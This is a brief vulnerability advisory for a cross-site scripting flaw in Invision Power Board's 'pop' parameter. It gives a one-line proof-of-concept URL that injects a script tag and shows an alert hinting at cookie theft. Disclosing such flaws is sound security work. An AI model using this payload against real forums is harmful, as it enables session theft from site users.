Invision Power Board Pop Parameter Cross-Site Scripting Vulnerability

Invision Power Board Pop Parameter Cross-Site Scripting Vulnerability

No exploit is required.

The following proof of concept has been supplied:
http://<host>/forum//index.php?s=&act=chat&pop=1;'><script>alert('this could be your cookie')</script>